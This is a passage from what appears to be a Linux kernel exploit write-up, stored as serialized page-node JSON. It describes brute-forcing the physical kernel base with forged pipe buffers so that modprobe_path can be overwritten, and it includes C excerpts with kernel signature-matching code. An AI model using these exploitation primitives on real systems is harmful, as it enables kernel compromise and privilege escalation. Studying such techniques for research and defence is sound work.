directly.",{"type":28,"tag":75,"props":57981,"children":57983},{"id":57982},"bruteforce-physical-kernel-base",[57984],{"type":33,"value":57985},"Bruteforce physical kernel base",{"type":28,"tag":29,"props":57987,"children":57988},{},[57989,57991,57997,57999,58004,58006,58012],{"type":33,"value":57990},"With the capability to iterate over kernel memory pages and read/write them, we could easily look for any value we want to overwrite, such as ",{"type":28,"tag":98,"props":57992,"children":57994},{"className":57993},[],[57995],{"type":33,"value":57996},"modprobe_path",{"type":33,"value":57998},". Keep in mind that simply searching page by page from the start of ",{"type":28,"tag":98,"props":58000,"children":58002},{"className":58001},[],[58003],{"type":33,"value":57961},{"type":33,"value":58005}," can be very time-consuming because the physical address at which the kernel base is loaded is randomized. However, the start of the kernel base is always aligned by a constant ",{"type":28,"tag":98,"props":58007,"children":58009},{"className":58008},[],[58010],{"type":33,"value":58011},"PHYSICAL_ALIGN",{"type":33,"value":58013}," value, 0x200000 by default in amd64, so we can significantly speed up our search by first only looking at aligned addresses for something that looks like the kernel base and then start a page by page search from there.",{"type":28,"tag":234,"props":58015,"children":58017},{"className":28765,"code":58016,"language":28767,"meta":7,"style":7},"[...]\n// Bruteforce phys-KASLR\n    uint64_t kernel_base;\n    bool found = false;\n    uint8_t data[PAGE_SIZE] = {0};\n    puts(\"[*] bruteforce phys-KASLR\");\n    for (uint64_t i = 0;; i++)\n    {\n        kernel_base = 0x40 * ((PHYSICAL_ALIGN * i) >> PAGE_SHIFT);\n        pipebuf->page = vmemmap_base + kernel_base;\n        pipebuf->offset = 0;\n        pipebuf->len = PAGE_SIZE + 1;\n[...]\n        for (int j = 0; j \u003C PIPE_SPRAY; j++)\n        {\n            memset(&data, 0, PAGE_SIZE);\n            int count;\n            if (count = read(pfd[j][0], &data, PAGE_SIZE) \u003C 0)\n            {\n                continue;\n            }\n[...]\n\n            if (is_kernel_base(data)) // [1] identify kernel base\n            {\n                found = true;\n                break;\n            }\n        }\n\n[...]\n",[58018],{"type":28,"tag":98,"props":58019,"children":58020},{"__ignoreMap":7},[58021,58028,58036,58044,58068,58101,58121,58161,58168,58212,58246,58273,58309,58316,58362,58369,58399,58412,58477,58484,58496,58504,58511,58518,58544,58551,58571,58583,58590,58597,58604],{"type":28,"tag":116,"props":58022,"children":58023},{"class":245,"line":246},[58024],{"type":28,"tag":116,"props":58025,"children":58026},{"style":266},[58027],{"type":33,"value":9986},{"type":28,"tag":116,"props":58029,"children":58030},{"class":245,"line":256},[58031],{"type":28,"tag":116,"props":58032,"children":58033},{"style":266},[58034],{"type":33,"value":58035},"// Bruteforce phys-KASLR\n",{"type":28,"tag":116,"props":58037,"children":58038},{"class":245,"line":293},[58039],{"type":28,"tag":116,"props":58040,"children":58041},{"style":266},[58042],{"type":33,"value":58043},"    uint64_t kernel_base;\n",{"type":28,"tag":116,"props":58045,"children":58046},{"class":245,"line":361},[58047,58051,58056,58060,58064],{"type":28,"tag":116,"props":58048,"children":58049},{"style":376},[58050],{"type":33,"value":46098},{"type":28,"tag":116,"props":58052,"children":58053},{"style":266},[58054],{"type":33,"value":58055}," found ",{"type":28,"tag":116,"props":58057,"children":58058},{"style":370},[58059],{"type":33,"value":373},{"type":28,"tag":116,"props":58061,"children":58062},{"style":376},[58063],{"type":33,"value":1022},{"type":28,"tag":116,"props":58065,"children":58066},{"style":266},[58067],{"type":33,"value":384},{"type":28,"tag":116,"props":58069,"children":58070},{"class":245,"line":387},[58071,58076,58080,58085,58089,58093,58097],{"type":28,"tag":116,"props":58072,"children":58073},{"style":376},[58074],{"type":33,"value":58075},"    uint8_t",{"type":28,"tag":116,"props":58077,"children":58078},{"style":272},[58079],{"type":33,"value":14768},{"type":28,"tag":116,"props":58081,"children":58082},{"style":266},[58083],{"type":33,"value":58084},"[PAGE_SIZE] ",{"type":28,"tag":116,"props":58086,"children":58087},{"style":370},[58088],{"type":33,"value":373},{"type":28,"tag":116,"props":58090,"children":58091},{"style":266},[58092],{"type":33,"value":44842},{"type":28,"tag":116,"props":58094,"children":58095},{"style":350},[58096],{"type":33,"value":353},{"type":28,"tag":116,"props":58098,"children":58099},{"style":266},[58100],{"type":33,"value":16239},{"type":28,"tag":116,"props":58102,"children":58103},{"class":245,"line":400},[58104,58108,58112,58117],{"type":28,"tag":116,"props":58105,"children":58106},{"style":282},[58107],{"type":33,"value":55125},{"type":28,"tag":116,"props":58109,"children":58110},{"style":266},[58111],{"type":33,"value":313},{"type":28,"tag":116,"props":58113,"children":58114},{"style":563},[58115],{"type":33,"value":58116},"\"[*] bruteforce phys-KASLR\"",{"type":28,"tag":116,"props":58118,"children":58119},{"style":266},[58120],{"type":33,"value":895},{"type":28,"tag":116,"props":58122,"children":58123},{"class":245,"line":614},[58124,58128,58132,58136,58140,58144,58148,58153,58157],{"type":28,"tag":116,"props":58125,"children":58126},{"style":260},[58127],{"type":33,"value":2703},{"type":28,"tag":116,"props":58129,"children":58130},{"style":266},[58131],{"type":33,"value":269},{"type":28,"tag":116,"props":58133,"children":58134},{"style":376},[58135],{"type":33,"value":55253},{"type":28,"tag":116,"props":58137,"children":58138},{"style":266},[58139],{"type":33,"value":54162},{"type":28,"tag":116,"props":58141,"children":58142},{"style":370},[58143],{"type":33,"value":373},{"type":28,"tag":116,"props":58145,"children":58146},{"style":350},[58147],{"type":33,"value":2718},{"type":28,"tag":116,"props":58149,"children":58150},{"style":266},[58151],{"type":33,"value":58152},";; i",{"type":28,"tag":116,"props":58154,"children":58155},{"style":370},[58156],{"type":33,"value":50888},{"type":28,"tag":116,"props":58158,"children":58159},{"style":266},[58160],{"type":33,"value":2830},{"type":28,"tag":116,"props":58162,"children":58163},{"class":245,"line":631},[58164],{"type":28,"tag":116,"props":58165,"children":58166},{"style":266},[58167],{"type":33,"value":28842},{"type":28,"tag":116,"props":58169,"children":58170},{"class":245,"line":665},[58171,58176,58180,58185,58189,58194,58198,58203,58207],{"type":28,"tag":116,"props":58172,"children":58173},{"style":266},[58174],{"type":33,"value":58175},"        kernel_base ",{"type":28,"tag":116,"props":58177,"children":58178},{"style":370},[58179],{"type":33,"value":373},{"type":28,"tag":116,"props":58181,"children":58182},{"style":350},[58183],{"type":33,"value":58184}," 0x40",{"type":28,"tag":116,"props":58186,"children":58187},{"style":370},[58188],{"type":33,"value":9484},{"type":28,"tag":116,"props":58190,"children":58191},{"style":266},[58192],{"type":33,"value":58193}," ((PHYSICAL_ALIGN ",{"type":28,"tag":116,"props":58195,"children":58196},{"style":370},[58197],{"type":33,"value":4240},{"type":28,"tag":116,"props":58199,"children":58200},{"style":266},[58201],{"type":33,"value":58202}," i) ",{"type":28,"tag":116,"props":58204,"children":58205},{"style":370},[58206],{"type":33,"value":12427},{"type":28,"tag":116,"props":58208,"children":58209},{"style":266},[58210],{"type":33,"value":58211}," PAGE_SHIFT);\n",{"type":28,"tag":116,"props":58213,"children":58214},{"class":245,"line":713},[58215,58220,58224,58228,58232,58237,58241],{"type":28,"tag":116,"props":58216,"children":58217},{"style":272},[58218],{"type":33,"value":58219},"        pipebuf",{"type":28,"tag":116,"props":58221,"children":58222},{"style":266},[58223],{"type":33,"value":13423},{"type":28,"tag":116,"props":58225,"children":58226},{"style":272},[58227],{"type":33,"value":57942},{"type":28,"tag":116,"props":58229,"children":58230},{"style":370},[58231],{"type":33,"value":2226},{"type":28,"tag":116,"props":58233,"children":58234},{"style":266},[58235],{"type":33,"value":58236}," vmemmap_base ",{"type":28,"tag":116,"props":58238,"children":58239},{"style":370},[58240],{"type":33,"value":2268},{"type":28,"tag":116,"props":58242,"children":58243},{"style":266},[58244],{"type":33,"value":58245}," kernel_base;\n",{"type":28,"tag":116,"props":58247,"children":58248},{"class":245,"line":750},[58249,58253,58257,58261,58265,58269],{"type":28,"tag":116,"props":58250,"children":58251},{"style":272},[58252],{"type":33,"value":58219},{"type":28,"tag":116,"props":58254,"children":58255},{"style":266},[58256],{"type":33,"value":13423},{"type":28,"tag":116,"props":58258,"children":58259},{"style":272},[58260],{"type":33,"value":13567},{"type":28,"tag":116,"props":58262,"children":58263},{"style":370},[58264],{"type":33,"value":2226},{"type":28,"tag":116,"props":58266,"children":58267},{"style":350},[58268],{"type":33,"value":2718},{"type":28,"tag":116,"props":58270,"children":58271},{"style":266},[58272],{"type":33,"value":384},{"type":28,"tag":116,"props":58274,"children":58275},{"class":245,"line":779},[58276,58280,58284,58288,58292,58297,58301,58305],{"type":28,"tag":116,"props":58277,"children":58278},{"style":272},[58279],{"type":33,"value":58219},{"type":28,"tag":116,"props":58281,"children":58282},{"style":266},[58283],{"type":33,"value":13423},{"type":28,"tag":116,"props":58285,"children":58286},{"style":272},[58287],{"type":33,"value":8807},{"type":28,"tag":116,"props":58289,"children":58290},{"style":370},[58291],{"type":33,"value":2226},{"type":28,"tag":116,"props":58293,"children":58294},{"style":266},[58295],{"type":33,"value":58296}," PAGE_SIZE ",{"type":28,"tag":116,"props":58298,"children":58299},{"style":370},[58300],{"type":33,"value":2268},{"type":28,"tag":116,"props":58302,"children":58303},{"style":350},[58304],{"type":33,"value":4192},{"type":28,"tag":116,"props":58306,"children":58307},{"style":266},[58308],{"type":33,"value":384},{"type":28,"tag":116,"props":58310,"children":58311},{"class":245,"line":796},[58312],{"type":28,"tag":116,"props":58313,"children":58314},{"style":266},[58315],{"type":33,"value":9986},{"type":28,"tag":116,"props":58317,"children":58318},{"class":245,"line":847},[58319,58324,58328,58332,58336,58340,58345,58349,58354,58358],{"type":28,"tag":116,"props":58320,"children":58321},{"style":266},[58322],{"type":33,"value":58323},"        for (",{"type":28,"tag":116,"props":58325,"children":58326},{"style":376},[58327],{"type":33,"value":18710},{"type":28,"tag":116,"props":58329,"children":58330},{"style":272},[58331],{"type":33,"value":8295},{"type":28,"tag":116,"props":58333,"children":58334},{"style":370},[58335],{"type":33,"value":2226},{"type":28,"tag":116,"props":58337,"children":58338},{"style":350},[58339],{"type":33,"value":2718},{"type":28,"tag":116,"props":58341,"children":58342},{"style":266},[58343],{"type":33,"value":58344},"; j ",{"type":28,"tag":116,"props":58346,"children":58347},{"style":370},[58348],{"type":33,"value":514},{"type":28,"tag":116,"props":58350,"children":58351},{"style":266},[58352],{"type":33,"value":58353}," PIPE_SPRAY; j",{"type":28,"tag":116,"props":58355,"children":58356},{"style":370},[58357],{"type":33,"value":50888},{"type":28,"tag":116,"props":58359,"children":58360},{"style":266},[58361],{"type":33,"value":2830},{"type":28,"tag":116,"props":58363,"children":58364},{"class":245,"line":898},[58365],{"type":28,"tag":116,"props":58366,"children":58367},{"style":266},[58368],{"type":33,"value":31308},{"type":28,"tag":116,"props":58370,"children":58371},{"class":245,"line":907},[58372,58377,58381,58385,58390,58394],{"type":28,"tag":116,"props":58373,"children":58374},{"style":282},[58375],{"type":33,"value":58376},"            memset",{"type":28,"tag":116,"props":58378,"children":58379},{"style":266},[58380],{"type":33,"value":313},{"type":28,"tag":116,"props":58382,"children":58383},{"style":370},[58384],{"type":33,"value":2780},{"type":28,"tag":116,"props":58386,"children":58387},{"style":266},[58388],{"type":33,"value":58389},"data, ",{"type":28,"tag":116,"props":58391,"children":58392},{"style":350},[58393],{"type":33,"value":353},{"type":28,"tag":116,"props":58395,"children":58396},{"style":266},[58397],{"type":33,"value":58398},", PAGE_SIZE);\n",{"type":28,"tag":116,"props":58400,"children":58401},{"class":245,"line":981},[58402,58407],{"type":28,"tag":116,"props":58403,"children":58404},{"style":376},[58405],{"type":33,"value":58406},"            int",{"type":28,"tag":116,"props":58408,"children":58409},{"style":266},[58410],{"type":33,"value":58411}," count;\n",{"type":28,"tag":116,"props":58413,"children":58414},{"class":245,"line":1011},[58415,58420,58425,58429,58434,58438,58443,58448,58452,58456,58460,58465,58469,58473],{"type":28,"tag":116,"props":58416,"children":58417},{"style":260},[58418],{"type":33,"value":58419},"            if",{"type":28,"tag":116,"props":58421,"children":58422},{"style":266},[58423],{"type":33,"value":58424}," (count ",{"type":28,"tag":116,"props":58426,"children":58427},{"style":370},[58428],{"type":33,"value":373},{"type":28,"tag":116,"props":58430,"children":58431},{"style":282},[58432],{"type":33,"value":58433}," read",{"type":28,"tag":116,"props":58435,"children":58436},{"style":266},[58437],{"type":33,"value":313},{"type":28,"tag":116,"props":58439,"children":58440},{"style":272},[58441],{"type":33,"value":58442},"pfd",{"type":28,"tag":116,"props":58444,"children":58445},{"style":266},[58446],{"type":33,"value":58447},"[j][",{"type":28,"tag":116,"props":58449,"children":58450},{"style":350},[58451],{"type":33,"value":353},{"type":28,"tag":116,"props":58453,"children":58454},{"style":266},[58455],{"type":33,"value":22723},{"type":28,"tag":116,"props":58457,"children":58458},{"style":370},[58459],{"type":33,"value":2780},{"type":28,"tag":116,"props":58461,"children":58462},{"style":266},[58463],{"type":33,"value":58464},"data, PAGE_SIZE) ",{"type":28,"tag":116,"props":58466,"children":58467},{"style":370},[58468],{"type":33,"value":514},{"type":28,"tag":116,"props":58470,"children":58471},{"style":350},[58472],{"type":33,"value":2718},{"type":28,"tag":116,"props":58474,"children":58475},{"style":266},[58476],{"type":33,"value":2830},{"type":28,"tag":116,"props":58478,"children":58479},{"class":245,"line":1029},[58480],{"type":28,"tag":116,"props":58481,"children":58482},{"style":266},[58483],{"type":33,"value":31344},{"type":28,"tag":116,"props":58485,"children":58486},{"class":245,"line":1038},[58487,58492],{"type":28,"tag":116,"props":58488,"children":58489},{"style":260},[58490],{"type":33,"value":58491},"                continue",{"type":28,"tag":116,"props":58493,"children":58494},{"style":266},[58495],{"type":33,"value":384},{"type":28,"tag":116,"props":58497,"children":58498},{"class":245,"line":1047},[58499],{"type":28,"tag":116,"props":58500,"children":58501},{"style":266},[58502],{"type":33,"value":58503},"            }\n",{"type":28,"tag":116,"props":58505,"children":58506},{"class":245,"line":1071},[58507],{"type":28,"tag":116,"props":58508,"children":58509},{"style":266},[58510],{"type":33,"value":9986},{"type":28,"tag":116,"props":58512,"children":58513},{"class":245,"line":1137},[58514],{"type":28,"tag":116,"props":58515,"children":58516},{"emptyLinePlaceholder":19},[58517],{"type":33,"value":1044},{"type":28,"tag":116,"props":58519,"children":58520},{"class":245,"line":1181},[58521,58526,58531,58535,58539],{"type":28,"tag":116,"props":58522,"children":58523},{"style":266},[58524],{"type":33,"value":58525},"            if (",{"type":28,"tag":116,"props":58527,"children":58528},{"style":339},[58529],{"type":33,"value":58530},"is_kernel_base",{"type":28,"tag":116,"props":58532,"children":58533},{"style":266},[58534],{"type":33,"value":313},{"type":28,"tag":116,"props":58536,"children":58537},{"style":339},[58538],{"type":33,"value":3372},{"type":28,"tag":116,"props":58540,"children":58541},{"style":266},[58542],{"type":33,"value":58543},")) // [1] identify kernel base\n",{"type":28,"tag":116,"props":58545,"children":58546},{"class":245,"line":1212},[58547],{"type":28,"tag":116,"props":58548,"children":58549},{"style":266},[58550],{"type":33,"value":31344},{"type":28,"tag":116,"props":58552,"children":58553},{"class":245,"line":1254},[58554,58559,58563,58567],{"type":28,"tag":116,"props":58555,"children":58556},{"style":266},[58557],{"type":33,"value":58558},"                found ",{"type":28,"tag":116,"props":58560,"children":58561},{"style":370},[58562],{"type":33,"value":373},{"type":28,"tag":116,"props":58564,"children":58565},{"style":376},[58566],{"type":33,"value":1129},{"type":28,"tag":116,"props":58568,"children":58569},{"style":266},[58570],{"type":33,"value":384},{"type":28,"tag":116,"props":58572,"children":58573},{"class":245,"line":1262},[58574,58579],{"type":28,"tag":116,"props":58575,"children":58576},{"style":260},[58577],{"type":33,"value":58578},"                break",{"type":28,"tag":116,"props":58580,"children":58581},{"style":266},[58582],{"type":33,"value":384},{"type":28,"tag":116,"props":58584,"children":58585},{"class":245,"line":1294},[58586],{"type":28,"tag":116,"props":58587,"children":58588},{"style":266},[58589],{"type":33,"value":58503},{"type":28,"tag":116,"props":58591,"children":58592},{"class":245,"line":1334},[58593],{"type":28,"tag":116,"props":58594,"children":58595},{"style":266},[58596],{"type":33,"value":1954},{"type":28,"tag":116,"props":58598,"children":58599},{"class":245,"line":1372},[58600],{"type":28,"tag":116,"props":58601,"children":58602},{"emptyLinePlaceholder":19},[58603],{"type":33,"value":1044},{"type":28,"tag":116,"props":58605,"children":58606},{"class":245,"line":1381},[58607],{"type":28,"tag":116,"props":58608,"children":58609},{"style":266},[58610],{"type":33,"value":9986},{"type":28,"tag":29,"props":58612,"children":58613},{},[58614,58616,58620,58622,58628,58630,58634],{"type":33,"value":58615},"Notice that at ",{"type":28,"tag":116,"props":58617,"children":58618},{},[58619],{"type":33,"value":1824},{"type":33,"value":58621}," we call the ",{"type":28,"tag":98,"props":58623,"children":58625},{"className":58624},[],[58626],{"type":33,"value":58627},"is_kernel_base()",{"type":33,"value":58629}," function. This is a function based on lau's exploit ",{"type":28,"tag":116,"props":58631,"children":58632},{},[58633],{"type":33,"value":17771},{"type":33,"value":58635}," that basically matches for multiple byte patterns that may exist at the kernel base page across different builds, to maximize compatibility.",{"type":28,"tag":234,"props":58637,"children":58639},{"className":28765,"code":58638,"language":28767,"meta":7,"style":7},"[...]\nstatic bool is_kernel_base(unsigned char *addr)\n{\n    // thanks lau :)\n\n    // get-sig kernel_runtime_1\n    if (memcmp(addr + 0x0, \"\\x48\\x8d\\x25\\x51\\x3f\", 5) == 0 &&\n        memcmp(addr + 0x7, \"\\x48\\x8d\\x3d\\xf2\\xff\\xff\\xff\", 7) == 0)\n        return true;\n\n    // get-sig kernel_runtime_2\n    if (memcmp(addr + 0x0, \"\\xfc\\x0f\\x01\\x15\", 4) == 0 &&\n        memcmp(addr + 0x8, \"\\xb8\\x10\\x00\\x00\\x00\\x8e\\xd8\\x8e\\xc0\\x8e\\xd0\\xbf\", 12) == 0 &&\n        memcmp(addr + 0x18, \"\\x89\\xde\\x8b\\x0d\", 4) == 0 &&\n        memcmp(addr + 0x20, \"\\xc1\\xe9\\x02\\xf3\\xa5\\xbc\", 6) == 0 &&\n        memcmp(addr + 0x2a, \"\\x0f\\x20\\xe0\\x83\\xc8\\x20\\x0f\\x22\\xe0\\xb9\\x80\\x00\\x00\\xc0\\x0f\\x32\\x0f\\xba\\xe8\\x08\\x0f\\x30\\xb8\\x00\", 24) == 0 &&\n        memcmp(addr + 0x45, \"\\x0f\\x22\\xd8\\xb8\\x01\\x00\\x00\\x80\\x0f\\x22\\xc0\\xea\\x57\\x00\\x00\", 15) == 0 &&\n        memcmp(addr + 0x55, \"\\x08\\x00\\xb9\\x01\\x01\\x00\\xc0\\xb8\", 8) == 0 &&\n        memcmp(addr + 0x61, \"\\x31\\xd2\\x0f\\x30\\xe8\", 5) == 0 &&\n        memcmp(addr + 0x6a, \"\\x48\\xc7\\xc6\", 3) == 0 &&\n        memcmp(addr + 0x71, \"\\x48\\xc7\\xc0\\x80\\x00\\x00\", 6) == 0 &&\n        memcmp(addr + 0x78, \"\\xff\\xe0\", 2) == 0)\n        return true;\n\n    return false;\n}\n[...]\n",[58640],{"type":28,"tag":98,"props":58641,"children":58642},{"__ignoreMap":7},[58643,58650,58680,58687,58695,58702,58710,58781,58843,58858,58865,58873,58941,59003,59064,59125,59187,59249,59310,59371,59432,59493,59554,59569,59576,59591,59598],{"type":28,"tag":116,"props":58644,"children":58645},{"class":245,"line":246},[58646],{"type":28,"tag":116,"props":58647,"children":58648},{"style":266},[58649],{"type":33,"value":9986},{"type":28,"tag":116,"props":58651,"children":58652},{"class":245,"line":256},[58653,58658,58663,58668,58672,58676],{"type":28,"tag":116,"props":58654,"children":58655},{"style":266},[58656],{"type":33,"value":58657},"static bool is_kernel_base(",{"type":28,"tag":116,"props":58659,"children":58660},{"style":376},[58661],{"type":33,"value":58662},"unsigned",{"type":28,"tag":116,"props":58664,"children":58665},{"style":376},[58666],{"type":33,"value":58667}," char",{"type":28,"tag":116,"props":58669,"children":58670},{"style":376},[58671],{"type":33,"value":9484},{"type":28,"tag":116,"props":58673,"children":58674},{"style":272},[58675],{"type":33,"value":30342},{"type":28,"tag":116,"props":58677,"children":58678},{"style":266},[58679],{"type":33,"value":2830},{"type":28,"tag":116,"props":58681,"children":58682},{"class":245,"line":293},[58683],{"type":28,"tag":116,"props":58684,"children":58685},{"style":266},[58686],{"type":33,"value":10547},{"type":28,"tag":116,"props":58688,"children":58689},{"class":245,"line":361},[58690],{"type":28,"tag":116,"props":58691,"children":58692},{"style":250},[58693],{"type":33,"value":58694},"    // thanks lau :)\n",{"type":28,"tag":116,"props":58696,"children":58697},{"class":245,"line":387},[58698],{"type":28,"tag":116,"props":58699,"children":58700},{"emptyLinePlaceholder":19},[58701],{"type":33,"value":1044},{"type":28,"tag":116,"props":58703,"children":58704},{"class":245,"line":400},[58705],{"type":28,"tag":116,"props":58706,"children":58707},{"style":250},[58708],{"type":33,"value":58709},"    // get-sig kernel_runtime_1\n",{"type":28,"tag":116,"props":58711,"children":58712},{"class":245,"line":614},[58713,58717,58721,58726,58731,58735,58740,58744,58748,58753,58757,58761,58765,58769,58773,58777],{"type":28,"tag":116,"props":58714,"children":58715},{"style":260},[58716],{"type":33,"value":11947},{"type":28,"tag":116,"props":58718,"children":58719},{"style":266},[58720],{"type":33,"value":269},{"type":28,"tag":116,"props":58722,"children":58723},{"style":282},[58724],{"type":33,"value":58725},"memcmp",{"type":28,"tag":116,"props":58727,"children":58728},{"style":266},[58729],{"type":33,"value":58730},"(addr ",{"type":28,"tag":116,"props":58732,"children":58733},{"style":370},[58734],{"type":33,"value":2268},{"type":28,"tag":116,"props":58736,"children":58737},{"style":350},[58738],{"type":33,"value":58739}," 0x0",{"type":28,"tag":116,"props":58741,"children":58742},{"style":266},[58743],{"type":33,"value":825},{"type":28,"tag":116,"props":58745,"children":58746},{"style":563},[58747],{"type":33,"value":2240},{"type":28,"tag":116,"props":58749,"children":58750},{"style":1836},[58751],{"type":33,"value":58752},"\\x48\\x8d\\x25\\x51\\x3f",{"type":28,"tag":116,"props":58754,"children":58755},{"style":563},[58756],{"type":33,"value":2240},{"type":28,"tag":116,"props":58758,"children":58759},{"style":266},[58760],{"type":33,"value":825},{"type":28,"tag":116,"props":58762,"children":58763},{"style":350},[58764],{"type":33,"value":17771},{"type":28,"tag":116,"props":58766,"children":58767},{"style":266},[58768],{"type":33,"value":1609},{"type":28,"tag":116,"props":58770,"children":58771},{"style":370},[58772],{"type":33,"value":2340},{"type":28,"tag":116,"props":58774,"children":58775},{"style":350},[58776],{"type":33,"value":2718},{"type":28,"tag":116,"props":58778,"children":58779},{"style":370},[58780],{"type":33,"value":52302},{"type":28,"tag":116,"props":58782,"children":58783},{"class":245,"line":631},[58784,58789,58793,58797,58802,58806,58810,58815,58819,58823,58827,58831,58835,58839],{"type":28,"tag":116,"props":58785,"children":58786},{"style":282},[58787],{"type":33,"value":58788},"        memcmp",{"type":28,"tag":116,"props":58790,"children":58791},{"style":266},[58792],{"type":33,"value":58730},{"type":28,"tag":116,"props":58794,"children":58795},{"style":370},[58796],{"type":33,"value":2268},{"type":28,"tag":116,"props":58798,"children":58799},{"style":350},[58800],{"type":33,"value":58801}," 0x7",{"type":28,"tag":116,"props":58803,"children":58804},{"style":266},[58805],{"type":33,"value":825},{"type":28,"tag":116,"props":58807,"children":58808},{"style":563},[58809],{"type":33,"value":2240},{"type":28,"tag":116,"props":58811,"children":58812},{"style":1836},[58813],{"type":33,"value":58814},"\\x48\\x8d\\x3d\\xf2\\xff\\xff\\xff",{"type":28,"tag":116,"props":58816,"children":58817},{"style":563},[58818],{"type":33,"value":2240},{"type":28,"tag":116,"props":58820,"children":58821},{"style":266},[58822],{"type":33,"value":825},{"type":28,"tag":116,"props":58824,"children":58825},{"style":350},[58826],{"type":33,"value":54289},{"type":28,"tag":116,"props":58828,"children":58829},{"style":266},[58830],{"type":33,"value":1609},{"type":28,"tag":116,"props":58832,"children":58833},{"style":370},[58834],{"type":33,"value":2340},{"type":28,"tag":116,"props":58836,"children":58837},{"style":350},[58838],{"type":33,"value":2718},{"type":28,"tag":116,"props":58840,"children":58841},{"style":266},[58842],{"type":33,"value":2830},{"type":28,"tag":116,"props":58844,"children":58845},{"class":245,"line":665},[58846,58850,58854],{"type":28,"tag":116,"props":58847,"children":58848},{"style":260},[58849],{"type":33,"value":15405},{"type":28,"tag":116,"props":58851,"children":58852},{"style":376},[58853],{"type":33,"value":1129},{"type":28,"tag":116,"props":58855,"children":58856},{"style":266},[58857],{"type":33,"value":384},{"type":28,"tag":116,"props":58859,"children":58860},{"class":245,"line":713},[58861],{"type":28,"tag":116,"props":58862,"children":58863},{"emptyLinePlaceholder":19},[58864],{"type":33,"value":1044},{"type":28,"tag":116,"props":58866,"children":58867},{"class":245,"line":750},[58868],{"type":28,"tag":116,"props":58869,"children":58870},{"style":250},[58871],{"type":33,"value":58872},"    // get-sig kernel_runtime_2\n",{"type":28,"tag":116,"props":58874,"children":58875},{"class":245,"line":779},[58876,58880,58884,58888,58892,58896,58900,58904,58908,58913,58917,58921,58925,58929,58933,58937],{"type":28,"tag":116,"props":58877,"children":58878},{"style":260},[58879],{"type":33,"value":11947},{"type":28,"tag":116,"props":58881,"children":58882},{"style":266},[58883],{"type":33,"value":269},{"type":28,"tag":116,"props":58885,"children":58886},{"style":282},[58887],{"type":33,"value":58725},{"type":28,"tag":116,"props":58889,"children":58890},{"style":266},[58891],{"type":33,"value":58730},{"type":28,"tag":116,"props":58893,"children":58894},{"style":370},[58895],{"type":33,"value":2268},{"type":28,"tag":116,"props":58897,"children":58898},{"style":350},[58899],{"type":33,"value":58739},{"type":28,"tag":116,"props":58901,"children":58902},{"style":266},[58903],{"type":33,"value":825},{"type":28,"tag":116,"props":58905,"children":58906},{"style":563},[58907],{"type":33,"value":2240},{"type":28,"tag":116,"props":58909,"children":58910},{"style":1836},[58911],{"type":33,"value":58912},"\\xfc\\x0f\\x01\\x15",{"type":28,"tag":116,"props":58914,"children":58915},{"style":563},[58916],{"type":33,"value":2240},{"type":28,"tag":116,"props":58918,"children":58919},{"style":266},[58920],{"type":33,"value":825},{"type":28,"tag":116,"props":58922,"children":58923},{"style":350},[58924],{"type":33,"value":17190},{"type":28,"tag":116,"props":58926,"children":58927},{"style":266},[58928],{"type":33,"value":1609},{"type":28,"tag":116,"props":58930,"children":58931},{"style":370},[58932],{"type":33,"value":2340},{"type":28,"tag":116,"props":58934,"children":58935},{"style":350},[58936],{"type":33,"value":2718},{"type":28,"tag":116,"props":58938,"children":58939},{"style":370},[58940],{"type":33,"value":52302},{"type":28,"tag":116,"props":58942,"children":58943},{"class":245,"line":796},[58944,58948,58952,58956,58961,58965,58969,58974,58978,58982,58987,58991,58995,58999],{"type":28,"tag":116,"props":58945,"children":58946},{"style":282},[58947],{"type":33,"value":58788},{"type":28,"tag":116,"props":58949,"children":58950},{"style":266},[58951],{"type":33,"value":58730},{"type":28,"tag":116,"props":58953,"children":58954},{"style":370},[58955],{"type":33,"value":2268},{"type":28,"tag":116,"props":58957,"children":58958},{"style":350},[58959],{"type":33,"value":58960}," 0x8",{"type":28,"tag":116,"props":58962,"children":58963},{"style":266},[58964],{"type":33,"value":825},{"type":28,"tag":116,"props":58966,"children":58967},{"style":563},[58968],{"type":33,"value":2240},{"type":28,"tag":116,"props":58970,"children":58971},{"style":1836},[58972],{"type":33,"value":58973},"\\xb8\\x10\\x00\\x00\\x00\\x8e\\xd8\\x8e\\xc0\\x8e\\xd0\\xbf",{"type":28,"tag":116,"props":58975,"children":58976},{"style":563},[58977],{"type":33,"value":2240},{"type":28,"tag":116,"props":58979,"children":58980},{"style":266},[58981],{"type":33,"value":825},{"type":28,"tag":116,"props":58983,"children":58984},{"style":350},[58985],{"type":33,"value":58986},"12",{"type":28,"tag":116,"props":58988,"children":58989},{"style":266},[58990],{"type":33,"value":1609},{"type":28,"tag":116,"props":58992,"children":58993},{"style":370},[58994],{"type":33,"value":2340},{"type":28,"tag":116,"props":58996,"children":58997},{"style":350},[58998],{"type":33,"value":2718},{"type":28,"tag":116,"props":59000,"children":59001},{"style":370},[59002],{"type":33,"value":52302},{"type":28,"tag":116,"props":59004,"children":59005},{"class":245,"line":847},[59006,59010,59014,59018,59023,59027,59031,59036,59040,59044,59048,59052,59056,59060],{"type":28,"tag":116,"props":59007,"children":59008},{"style":282},[59009],{"type":33,"value":58788},{"type":28,"tag":116,"props":59011,"children":59012},{"style":266},[59013],{"type":33,"value":58730},{"type":28,"tag":116,"props":59015,"children":59016},{"style":370},[59017],{"type":33,"value":2268},{"type":28,"tag":116,"props":59019,"children":59020},{"style":350},[59021],{"type":33,"value":59022}," 0x18",{"type":28,"tag":116,"props":59024,"children":59025},{"style":266},[59026],{"type":33,"value":825},{"type":28,"tag":116,"props":59028,"children":59029},{"style":563},[59030],{"type":33,"value":2240},{"type":28,"tag":116,"props":59032,"children":59033},{"style":1836},[59034],{"type":33,"value":59035},"\\x89\\xde\\x8b\\x0d",{"type":28,"tag":116,"props":59037,"children":59038},{"style":563},[59039],{"type":33,"value":2240},{"type":28,"tag":116,"props":59041,"children":59042},{"style":266},[59043],{"type":33,"value":825},{"type":28,"tag":116,"props":59045,"children":59046},{"style":350},[59047],{"type":33,"value":17190},{"type":28,"tag":116,"props":59049,"children":59050},{"style":266},[59051],{"type":33,"value":1609},{"type":28,"tag":116,"props":59053,"children":59054},{"style":370},[59055],{"type":33,"value":2340},{"type":28,"tag":116,"props":59057,"children":59058},{"style":350},[59059],{"type":33,"value":2718},{"type":28,"tag":116,"props":59061,"children":59062},{"style":370},[59063],{"type":33,"value":52302},{"type":28,"tag":116,"props":59065,"children":59066},{"class":245,"line":898},[59067,59071,59075,59079,59084,59088,59092,59097,59101,59105,59109,59113,59117,59121],{"type":28,"tag":116,"props":59068,"children":59069},{"style":282},[59070],{"type":33,"value":58788},{"type":28,"tag":116,"props":59072,"children":59073},{"style":266},[59074],{"type":3